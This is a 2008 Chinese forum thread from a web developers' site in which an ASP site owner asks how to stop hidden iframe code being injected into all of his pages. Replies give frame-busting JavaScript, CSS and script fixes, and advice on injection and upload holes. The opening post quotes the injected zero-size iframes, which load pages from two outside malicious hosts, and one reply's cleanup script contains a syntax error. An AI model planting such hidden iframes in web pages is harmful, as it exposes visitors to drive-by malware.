首页
新闻
论坛
群组
Blog
文档
下载
读书
Tag
网摘
搜索
.NET
Java
游戏
视频
人才
外包
培训
数据库
书店
程序员
欢迎您:
游客
| 退出
| 登录
注册
帮助
我的帖子
我参与的帖子
我的空间
我的网摘
CSDN
CSDN社区
Web 开发
ASP
将帖子提前
放进我的网摘
推荐给好友
我要提问
帖子加分
生成帖子
置顶
推荐(加精)
取消推荐(加精)
锁定帖子
移动帖子
结贴去...
管理菜单
页面风格切换
标准风格
老版本论坛
asp网站常被网页常被加框架页面怎么办??求详细原因及解决方法
[已结贴,结贴人:kokuka]
加为好友
发送私信
在线聊天
kokuka
木木
等级:
发表于:
2008-02-13 13:51:15
楼主
网站的网页常被挂上如下代码
<iframe src=http://aaa.77xxmm.cn/neW858.htm?075 width=0 name='3284' height=0> </ifRame> <ifRame src=hTTp://aaa.1l1l1l.com/error/404.hTml widtH=0 name='3284' height=0> </iframe>
所有网页都被挂上,数据库文件我设置的名字是以.asp为后缀,结果可能也被加代码,不能使用了,
小弟asp水平很低,求详细原因及解决方法,并求高手能指点网站如何做好安全防范,我的网站是租用的新网的虚拟主机。
我在这个区每次只能给100分,如能解决问题, 我会再开新贴感谢,非常感谢。
问题点数:
100
回复次数:
16
显示所有回复
显示星级回复
显示楼主回复
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
snlixing
好好学习,天天向上!
等级:
发表于:
2008-02-13 14:00:13
1
楼 得分:
20
在head区加上
<Script LANGUAGE="JavaScript">
if(self!=top){top.location=self.location;}
</script>
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
guo2478858
等级:
发表于:
2008-02-13 14:05:24
2
楼 得分:
0
mark 学习下,楼上的能给我解释下这段js的作用什么啊。
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
newsera
等级:
发表于:
2008-02-13 14:11:22
3
楼 得分:
0
你的网站被注入了,你看看网站空间FSO权限是否开通,之后在把网站原文件下载下来,检查一下所有页面有FSO权限的网页
注:一定要检查你的无组件上传文件是否限制只能上传图片,如果小黑上传一个.asp的网页你也没有限制那就是你的错了,还有一定要看一下你的后台页面是不是都判断登陆了!
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
chinmo
藏*无限
等级:
发表于:
2008-02-13 14:37:18
4
楼 得分:
0
呵呵,楼上说得只是易部分,不过一般你只要把注入漏洞堵了和把上传漏洞堵了就基本没事了!
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
showbo
iloveC#
等级:
发表于:
2008-02-13 15:32:27
5
楼 得分:
0
我看是被arp了.....
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
chinmo
藏*无限
等级:
发表于:
2008-02-13 15:38:04
6
楼 得分:
0
新网的虚拟主机一般服务器权限不会被拿
基本是你网站的漏洞!
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
kokuka
木木
等级:
发表于:
2008-02-13 17:24:03
7
楼 得分:
0
谢谢,大家是不是主要是注入漏洞 和把上传漏洞 造成的?
能比较详细的介绍下如何防止注入漏洞吗? 我刚学习网站编程,很多不大明白,能说的详细一些吗?非常感谢
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
kokuka
木木
等级:
发表于:
2008-02-13 17:25:02
8
楼 得分:
0
二楼 snlixing 的代码能解释下吗? 学习一下,谢谢
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
wanghui0380
放歌
等级:
发表于:
2008-02-13 17:43:05
9
楼 得分:
0
这种问题不是你可以解决的,你应该向空间提供商反应
由他们为主,你做配合来解决
使用询问空间商该服务器上的其他客户站是否都有毛病,如果其他客户都被挂马,你一个人清理是没任何效果的
如果只有你的站有毛病,请使用批量文件替换器把马先去掉,在让空间商把你的ftp用户名和密码换掉后,重新传,并让空间上在服务器上使用 安全伞 Filemon等工具监控一下文件修改和执行情况,配合iis日志,ftp日志很容易就知道是那个站的那个页面有问题了
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
wwwwf66com
影子影子
等级:
发表于:
2008-02-13 20:01:25
10
楼 得分:
0
Css 防iframe挂马.
原页面中无iframe的,可以这样来.
复制内容到剪贴板代码:
iframe{v:expression(this.src="about:blank",this.outerHTML='');}
这是将所有的iframe重定向了.
或者
复制内容到剪贴板代码:
fuckiframe{
width:1px;
overflow:hidden;
text-overflow:clip;
white-space: nowrap;
clear: none;
float: none;
line-height: 0px;
display: inline;
}
然后在网页的最后一行加上一个标签
复制内容到剪贴板代码:
<fuckiframe>
样也同样能使加在网页最后一行的iframe失效.
当然这些仅是权yi之计.治标不治本.只是为网页加一层防护罢了.程序安全,还是最重要的.
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
szxiaokang
等级:
发表于:
2008-02-19 11:25:59
11
楼 得分:
0
估计是你程序有漏洞,大部分都是这样的
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
dsmy
人在他乡
等级:
发表于:
2008-02-19 11:45:14
12
楼 得分:
0
arp 的可能性大啊
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
chinmo
藏*无限
等级:
发表于:
2008-02-19 11:48:11
13
楼 得分:
0
呵呵,你网站有漏洞,所以才被人经常挂!arp 的话不是实际存在的,如果你网页里实际存在那代码,那就是你网站或者服务器有漏洞被人拿服务器了!
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
chinmo
藏*无限
等级:
发表于:
2008-02-19 11:49:37
14
楼 得分:
40
所有网页都被挂上,数据库文件我设置的名字是以.asp为后缀,结果可能也被加代码,不能使用了,
那就是你网站已经被人入侵了,请用安全检测工具检测是否残留木马,然后逐个文件检查是否存在什么漏洞!
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
xiaojing7
═══════>>> 枯井
等级:
发表于:
2008-02-19 11:53:56
15
楼 得分:
40
使用文本替换工具将里面的 <iframe> src=http://*** </iframe> 全部清除,加以下代码可杜绝
<script language="javascript">
window.onload = function()
{
var arr = document.getElementsByTagName("IFRAME");
for (var i = 0; i < arr.length; i++0)
{
arr[i].parentNode.removeChild(arr[i]);
}
}
</script>
修改
删除
举报
引用
回复
加为好友
发送私信
在线聊天
chinmo
藏*无限
等级:
发表于:
2008-02-19 11:58:57
16
楼 得分:
0
加任何代码都没用的,是他网站或者服务器有漏洞
修改
删除
举报
引用
回复
将帖子提前
放进我的网摘
推荐给好友
我要提问
帖子加分
结贴去...
管理菜单
页面风格切换
标准风格
老版本论坛
网站简介
-
广告服务
-
网站地图
-
帮助
-
联系方式
-
诚聘英才
-
English
-
问题报告
世纪乐知(北京)网络技术有限公司 版权所有 京 ICP 证 020026 号
Copyright © 2000-2007, CSDN.NET, All Rights Reserved
abc推荐给好友
[已结贴,结贴人:kokuka]
